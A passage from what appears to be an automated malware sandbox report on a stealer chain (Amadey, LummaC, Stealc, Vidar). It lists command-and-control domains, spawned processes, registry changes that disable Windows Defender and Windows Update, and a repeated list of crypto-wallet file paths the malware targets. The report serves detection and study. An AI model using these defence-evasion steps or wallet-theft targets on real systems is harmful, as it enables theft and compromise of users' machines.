,P-D-98331-6-32\",\"EdgeFirstRunConfig\":\"P-R-1075865-1-7\",\"Segmentation\":\"P-R-1159985-1-5,P-R-1113915-25-11,P-R-1098334-1-6,P-R-66078-1-3,P-R-66077-1-5,P-R-60882-1-2,P-R-43082-3-5,P-R-42744-1-2\"}","Edge":{"AccountLevelSyncReclaim":{"enableFeatures":["msAccountLevelSyncConsent","msNurturingAccountLevelSyncConsentSyncOff","msNurturingAccountLevelSyncConsentSyncOn"]},"AdsPlatformXEdgeexp":{"enableFeatures":["msEdgeAdPlatformUI","msEdgeAdPlatformBingPathsV3","msEdgeAdPlatformProtobufMigration","msEdgeAdPlatformUseIdentity"]},"ArrestUserChurn":{"enableFeatures":["msLoadChromeWebstoreByDefault"]},"DefaultBrowserBannerExternalStableRollout":{"enableFeatures":["msNurturingDefaultBrowserBannerCloseBtn","msNurturingUrlParser","msEdgeNurFIrisSupport"],"parameters":[{"name":"DismissalCap","value":"1000"}]},"DisablePageActionIcons":{"enableFeatures":["msOmniboxDisablePageActionIcons"],"parameters":[{"name":"msDisableOmniboxTriggeredIcon","value":"12,16"}]},"DisconnectedErrorPageVariations":{"enableFeatures":["msShowTroubleshootButtonOnErrorPage","msDisconnectedErrorPageVariation2"]},"EdgeOnRampShowVersionWhatsNew":{"enableFeatures":["msEdgeOnRampShowWhatsNew"],"parameters":[{"name":"Browser Version","value":"130.0.0.0"}]},"EdgeShoppingDisableAbandonedCart":{"disableFeatures":["msEdgeShoppingPwiloNotificationsAbandonedCarts"]},"EdgeShoppingDomMutationExpansion":{"enableFeatures":["msShoppingExp67"]},"EdgeShoppingOnlineSelectorExtraction":{"enableFeatures":["msShoppingExp1"]},"EdgeVpnAllSites":{"enableFeatures":["msEnableVpnA

LummaC encrypted strings found

Source: 6ca8f7e5e2.exe, 0000001C.00000002.3228179209.0000000000AA1000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: scriptyprefej.store
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3228179209.0000000000AA1000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: navygenerayk.store
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3228179209.0000000000AA1000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: founpiuer.store
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3228179209.0000000000AA1000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: necklacedmny.store
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3228179209.0000000000AA1000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: thumbystriw.store
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3228179209.0000000000AA1000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: fadehairucw.store
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3228179209.0000000000AA1000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: crisiwarny.store
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3228179209.0000000000AA1000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: presticitpo.store

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDHCAECGIEB.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsDHCAECGIEB.exe "C:\Users\user\DocumentsDHCAECGIEB.exe"
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe "C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe "C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe "C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe"
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C884760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C884760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C761C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6C761C30

Source: file.exe, file.exe, 00000000.00000002.2407741412.0000000000973000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C83AE71 cpuid

0_2_6C83AE71

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005203011\clip.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005203011\clip.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C83A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6C83A8DC

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 24_2_00AD65E0 LookupAccountNameA,

24_2_00AD65E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 24_2_00B12517 GetTimeZoneInformation,

24_2_00B12517

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C788390 NSS_GetVersion,

0_2_6C788390

Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.0000000001271000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3213115513.0000000001160000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3213031604.0000000001184000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3634688340.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3634895653.00000000014E8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 30.2.rundll32.exe.6f6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.rundll32.exe.6f6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.rundll32.exe.6f6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.rundll32.exe.6e0b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.rundll32.exe.6e0b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\clip[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 22.2.skotes.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.skotes.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.DocumentsDHCAECGIEB.exe.560000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2449462094.0000000000561000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.5401595733.0000000000AD1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2487450348.0000000000AD1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 8632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 35.2.6ca8f7e5e2.exe.59534a1.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.3041803841.00000000000D1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2020668907.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.3385606032.0000000005F51000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.3001438574.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.3732193014.0000000008700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2407206885.00000000005A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.3470246270.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409398510.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3043088426.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3328651914.00000000083E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.3467869264.00000000000D1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3776899724.0000000006261000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3378808453.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9305c7ab92.exe PID: 3872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9305c7ab92.exe PID: 2968, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 8104, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2409398510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 16.113Users\user\AppData\Roaming\Exodus\window-state.json
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local 